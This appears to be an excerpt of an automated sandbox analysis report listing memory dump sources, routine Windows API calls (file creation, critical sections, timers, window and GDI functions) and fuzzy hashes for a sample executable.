                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wave$Sleep$CloseEventHeaderKillResetUnpreparetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3030913982-0
                                                                                                                                                        • Opcode ID: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                        • Instruction ID: 723e303dfaa0e6e3e16fcc3d7d301ea8209cd941138754b25ec6b12d62c8e06b
                                                                                                                                                        • Opcode Fuzzy Hash: 8109bb966e39f4028d6bd6d558cf8393c4574c35e2cabacb2eafa3e008f2b1ca
                                                                                                                                                        • Instruction Fuzzy Hash: 0401ADB5A00214ABC3149F14EC88AAEB7F8FB98B11F00091BF41497301CB79A9598BF5
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000,?,?,00000000,00000008,?,?,00000008,00000000,?), ref: 004CF94E
                                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,-00000001,00000000,00000008,?,?,00000008,00000000,?,?,00000008,00000000), ref: 004CF99D
                                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,-00000001,00000000), ref: 004CF9BF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: \\?\
                                                                                                                                                        • API String ID: 823142352-4282027825
                                                                                                                                                        • Opcode ID: 376ab17d5f20b45453c8a02f070f33256ae20b81cf581a7a00a9a8db08631464
                                                                                                                                                        • Instruction ID: d900b4c61e2357813c95f9d4093febd61d3ae0210469f6574eac6d9984f09979
                                                                                                                                                        • Opcode Fuzzy Hash: 376ab17d5f20b45453c8a02f070f33256ae20b81cf581a7a00a9a8db08631464
                                                                                                                                                        • Instruction Fuzzy Hash: A141C2B5904300BBEB50EB21DC86F1B77A9EB89348F24092EF54597381D63DDC48C7A6
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,004DDFDB,000000FF,00000001,004DE7BA), ref: 004DD6FC
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD71E
                                                                                                                                                          • Part of subcall function 004FA760: EnterCriticalSection.KERNEL32(?,?,00000000,76ECE820,?,004DD732), ref: 004FA76A
                                                                                                                                                          • Part of subcall function 004FA760: LeaveCriticalSection.KERNEL32(?), ref: 004FA77A
                                                                                                                                                          • Part of subcall function 004DC9A0: EnterCriticalSection.KERNEL32 ref: 004DCA0C
                                                                                                                                                          • Part of subcall function 004DC9A0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 004DCA1D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD741
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD744
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004DD74C
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD771
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004DD774
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2978645861-0
                                                                                                                                                        • Opcode ID: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                        • Instruction ID: 32add75de912499d63db8df7e296ef1919b4cd71e3024a8d459c2c8f380e6b48
                                                                                                                                                        • Opcode Fuzzy Hash: ff1ce3d31db78686b43d8a54f5086c5c7705279757a9b448e26e3c6c897d228c
                                                                                                                                                        • Instruction Fuzzy Hash: 59012975302A155FD324EB2ADC90B6BE3F9AF91354F00842FE546C3750CB64FC058AA9
                                                                                                                                                        APIs
                                                                                                                                                        • CreateWindowExA.USER32(00000000,STATIC,Dummy,80000000,00000000,00000000,00000005,00000005,00000000,00000000,00000000,00000000), ref: 004D866B
                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000EB,00000000), ref: 004D8683
                                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,004D8520), ref: 004D8690
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Long$Create
                                                                                                                                                        • String ID: Dummy$STATIC
                                                                                                                                                        • API String ID: 1733017098-132613206
                                                                                                                                                        • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                        • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                        • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                        • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                        • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                        • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                        • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                        • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                        • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1404962471-0
                                                                                                                                                        • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                        • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                        • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                        • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                        • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                        • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1430435781-0
                                                                                                                                                        • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                        • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                        • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                        • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                                        • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                        • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                        • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                        • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                        APIs
                                                                                                                                                        • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000013.00000002.2154071161.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000013.00000002.2154043638.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154238787.000000000053D000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000555000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154280942.0000000000562000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154362643.0000000000628000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154479044.00000000006E7000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154507905.00000000006EA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154539053.00000000006F5000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154571075.00000000006F9000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154606023.0000000000700000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154636847.0000000000703000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154667975.0000000000709000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154697284.000000000070E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154738180.000000000073C000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        • Associated: 00000013.00000002.2154774306.000000000073F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_123123213123123321132.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3777265051-0
                                                                                                                                                        • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                        • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                        • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
